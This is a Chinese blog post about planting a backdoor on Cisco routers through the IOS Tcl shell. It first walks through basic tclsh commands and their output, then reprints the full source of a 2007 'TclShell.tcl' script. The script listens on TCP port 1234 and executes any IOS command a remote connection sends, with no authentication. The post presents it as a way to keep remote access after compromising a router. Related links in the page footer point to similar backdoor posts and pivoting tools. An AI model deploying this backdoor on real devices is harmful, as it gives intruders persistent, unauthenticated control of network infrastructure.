Cisco路由器后门技术 -- TCL脚本Shell

最新推荐文章于 2024-04-26 15:09:51 发布
最新推荐文章于 2024-04-26 15:09:51 发布
阅读量8.3k 收藏 3
点赞数 2
分类专栏: Cisco

    今天逛国外站发现了一篇攻击Cisco路由器留后门的方法,虽然一年多没玩Cisco了,平时工作也用不到这东西,但是对Cisco还是那么热爱,呵呵!进入正题,这是一篇鸟语的文章,写的也不难,主要的意思就是拿到Cisco路由器的权限以后可以上传一个用TCL脚本语言写的后门程序到设备里面,以后就可以无需路由器管理权限远程Telne进路由器了,灰常给力!关于TCL脚本语言相信CCIE Security级别的Cisco高级玩家都比较熟悉,反正我当年学CCNP的时候课程里面几乎没怎么提到TCL脚本,这东西在Cisco下是个灰常给力的东西,可以帮助工程师完成很多蛋疼的活!例如:在设备上批量的去Ping一个IP地址段等操作。

1.写在前面的废话:

其实Cisco IOS 从12.3(2)T 开始就支持TCL脚本了,下面在7200路由器的12.4 IOS 来试验一下TCL脚本。

Router>
Router>enable
Router#tclsh
Router(tcl)#puts $tcl_version
8.3
Router(tcl)#package names
tbcload Tcl
Router(tcl)#info commands
tell socket subst open eof pwd glob list exec pid snmp_getone time eval lrange t
cl_trace fblocked lsearch gets case lappend proc break variable llength return l
insert snmp_getid error catch clock info split array if log_user fconfigure conc
at join lreplace snmp_setany source fcopy global switch snmp_getbulk update clos
e cd for file append format read package set binary namespace scan verify_signat
ure seek while flush after vwait snmp_getnext typeahead uplevel continue hostnam
e ios_config foreach rename fileevent regexp upvar unset encoding expr load regs
ub interp history puts incr lindex lsort string
Router(tcl)#

现在一条一条的解释上面的命令及其输出:

  1. 使用 enable 命令进入特权 EXEC 模式。
  1. 使用 tclsh 命令进入 Tcl Shell 命令行,现在可以输入 Tcl 指令了。
  1. 使用 puts $tcl_version 打印当前 Tcl 版本。puts 是 Tcl 指令,相当于 C 语言中的 printf,而 $tcl_version 是 Tcl 的一个公共变量。
  1. 使用 package names 命令列出当前系统中已安装的 Tcl 扩展。要注意的一个扩展是 tbcload,Tcl 源代码被 tclcompiler 编译加密为 *.tbc 文件后,需要用此扩展来解释执行。
  1. 使用 info commands 命令来列出当前 Tcl 解释器支持的关键字。可以看到 if、for、foreach 等循环指令,操作文件与目录的 file、open、seek、read 等指令,基本的数据结构 list、array、哈希表等,字符串操作与正则表达式等等都被支持。有这样的阵容,编写强大的、全功能的 Cisco Tcl 脚本将十分方便。

2.Cisco设备写TCL Shell方法:


TCL脚本后门语法高亮显示如下图:


Source Code 如下:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

-------------------------------------------------------------------------------------

3.写在最后的废话:

TCL脚本的确是个不错的东西,建议Cisco玩家们都学学,无论是CCNA也好,CCNP也好,这东西都会给工作带来很大帮助,想学的就猛击这里吧。

Attacking Cisco Router over TCL英文原文地址:http://www.sectechno.com/2010/11/07/attacking-cisco-router-over-tcl/

详细的写入TCL Shell英文原文介绍:http://www.irmplc.com/downloads/whitepapers/Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf


seaskying
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
思科路由器设置IS-IS具体步骤
10-01
主要为大家介绍了怎么设置思科路由器IS-IS,很多熟悉思科路由器的朋友都知道sisi,但是对于新手来说,就不知道思科路由器设置IS-IS该怎么处理了,以下是思科路由器使用IS-IS路由IP的基本设置步骤:
思科Cisco路由器access-list访问控制列表命令详解
10-01
Cisco路由器中,访问控制列表(access-list,ACL)是一种强大的工具,用于管理网络流量,通过对数据包进行筛选,允许或拒绝特定类型的通信。访问列表分为两种主要类型:标准访问列表和扩展访问列表。 标准访问...
tcl socket 编程
lchunl9707的专栏
10-11 4580
tcl编程很简单,但tcl只支持tcp协议,可以通过tcl编写客户端和服务器端<br />编写服务器端很简单,譬如<br />socket -server callback 9999;#此处callback是一个事先写好的回调函数,需要接受三个参数socketid remote address和 remote port 如果该pc有多个网卡,缺省针对所有接口,可以通过选项 myaddr 指定特定ip<br />socket -myaddr 1.1.1.1 -server callback 9999<br /
Cisco TclShell Code (Cisco路由器后门源代码)
weixin_34233856的博客
11-07 457
===code=== # proc callback {sock addr port} { fconfigure $sock -translation lf -buffering line puts $sock " " puts $sock "=====================================" puts $sock "...
思科交换机配置脚本
最新发布
normanhere的博客
04-26 485
switch(config)#snmp-server host 192.168.3.99 informs version 2c trapsecrect 发送trap的那台PC。sw1(config)#vtp mode server //配置VTP为Server模式,默认即为Server。sw1(config)#vtp version 2 //配置VTP版本,只需在Server上配置。sw1(config)#vtp domain VTP-Test //配置VTP域名,默认为空。
Tcl/TK -- Socket
黑仔ZJM
01-10 2709
set ip localhost set port 12345if {[catch {set sock [socket $ip $port]}]} { puts stderr exit}
tcl socket
weixin_30433075的博客
12-08 1054
1.socket 服务端开启格式:socket –server command ?options? port-server :表明开启的是服务器端port:端口command:当有客户端来连接的时候,执行这个过程,这个过程有三个参数channel:给新客户端的通道address:提供给客户端连接的 ip 地址port:端口 2.客户端连接服务器端格式:socket ?optio...
tclsh命令, cisco 快速测试工具
繁星流动天际
04-07 715
tclsh命令, cisco 快速测试工具,挺实用的 下述工具可用于在路由器上快速测试目标主机是否能ping通,在割接和实验环境中尤为有用,遗憾的是,不能在所有的IOS版本中使用,在12.2(25)S 以上版本才可以,本人在25、26及36和75系列路由器、6500交换机上成功使用。 tclsh foreach ip { 162.17.1.1 162.17.2.2 10.7.10.1...
CISCO路由器中PIM-SM的启用和验证.pdf
10-09
CISCO路由器中PIM-SM的启用和验证】涉及的知识点主要集中在IP组播、组播路由协议PIM-SM及其配置应用上。PIM(Protocol Independent Multicast)是协议无关组播,它允许使用不同的单播路由协议(如静态路由、EIGRP...
利用Cisco路由器的Access-list提高网络安全.pdf
10-09
利用Cisco路由器的Access-list提高网络安全.pdf
Cisco 路由器 实用技术 -- 二
12-26
Cisco 路由器 实用技术 王劲松 苗玲 韩* 编著 书中分别讲解了路由器的作用与地位、基本配置方法、路由器物理接口配置、接口连通性测试、IP路由配置、转发控制配置、路由交换机与VLAN的运用。最后还简单介绍了网络...
TCLtools:选择TCL脚本进行Cisco IOS渗透测试
04-30
用于Cisco IOS渗透测试的TCL脚本 借助TCLtools,您可以将任何Cisco IOS硬件转变为枢轴站。 易于设置和使用! 特征 TCLmap —端口扫描程序实施(nmap) TCLproxy —代理服务器实现 TCL代理 TCLproxy是用于通过Cisco设备进行数据透视的工具。 它能够转发任何TCP端口或启动代理服务器。 TCLproxy v0.0.3 Usage: tclsh ./tclproxy.tcl [-L address]... [-D address]... Proxy server implementation. Binary protocols are supported. -L [bind_address:]port:remote_host:remote_port Forward a remote port to a local port.
TCL脚本语言基本教程
09-11
很给力的脚本语言教程对我们学习自动编程后处理有很大的作用
afraid6:用于更新路由器 AAAA 动态 DNS 记录的 Cisco EEM TCL 脚本(使用 freedns.afraid.org)
06-26
害怕6.tcl Cisco EEM TCL 脚本使用freedns.afraid.org更新路由器的 AAAA 动态 DNS 记录。 默认fear.org 也会一次性更新你的A 记录。 打开fear6.tcl并替换这两个变量: # You can use short interface names (Fa0, Gi0/1, Di0) for $int set int "Dialer0" [..] # Your "secret" update URL. Replace "YOUR_BASE64_SECRET==". set url "http://freedns.afraid.org/dynamic/update.php?YOUR_BASE64_SECRET==&address=$v6addr" 将fear6.tcl复制到您的路由器闪存中此行在您的配置中指定的位置: event m
使用TCL脚本过滤思科路由器日志
weixin_34329187的博客
05-17 686
当登录到一台路由器查看日志时,突然发现: May 17 10:21:55: %ENVMON-4-FAN_LOW_RPM: Fan 3 service recommendedMay 17 10:22:25: %ENVMON-4-FAN_LOW_RPM: Fan 1 service recommendedMay 17 10:22:25: %ENVMON-4-FAN_LOW_RPM: Fan 3 se...
TCL脚本语言学习
weixin_44606964的博客
02-03 2138
如果字符串相同就返回0(str1=str2),如果 str1 的顺序比 str2 靠前就返回-1(str1str2)。列表命令比较少,且因为处理列表很常用,所以列表的命令都需要很熟悉才能在写脚本的时候得心应手。记住各个命令的功能,在实际要用到命令的时候再查找命令的具体用法。在innovus命令栏中输入help *collection就可以查找所有的集合命令,man 也可以获取各个命令的使用说明。dbGet是基于一种树状的结构,通过这样的结构去获取设计中的 数据。
网络基本功(十四):细说诊断工具ping
学习,思考,记录
02-27 1999
转载请在文首保留原文出处:EMC中文支持论坛https://community.emc.com/go/chinese 介绍   ping的工作原理很简单,一台网络设备发送请求等待另一网络设备的回复,并记录下发送时间。接收到回复之后,就可以计算报文传输时间了。只要接收到回复就表示连接是正常的。耗费的时间喻示了路径长度。重复请求响应的一致性也表明了连接质量的可靠性。因此,ping
Cisco Router Backdoor -- TCL Shell
foj5678的专栏
03-15 1211
From: http://www.fuckhacker.net/archives/33/ 关于Cisco路由器的一款BackDoor,自由发挥想象! 转载自 secbug 今天逛国外站发现了一篇攻击Cisco路由器后门的方法,虽然一年多没玩Cisco了,平时工作也用不到这东西,但是对Cisco还是那么热爱,呵呵!进入正题,这是一篇鸟语的文章,写的也不难,主要的意思就是拿到Cisco路由器
Attacking Cisco Router over TCL
weixin_34380948的博客
11-02 250
今天逛国外站发现了一篇攻击Cisco路由器后门的方法,虽然一年多没玩Cisco了,平时工作也用不到这东西,但是对Cisco还是那么热爱,呵呵!进入正题,这是一篇鸟语的文章,写的也不难,主要的意思就是拿到Cisco路由器的权限以后可以上传一个用TCL脚本语言写 的后门程序到设备里面,以后就可以无需路由器管理权限远程Telne进路由器了,灰常给力!关于TC...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值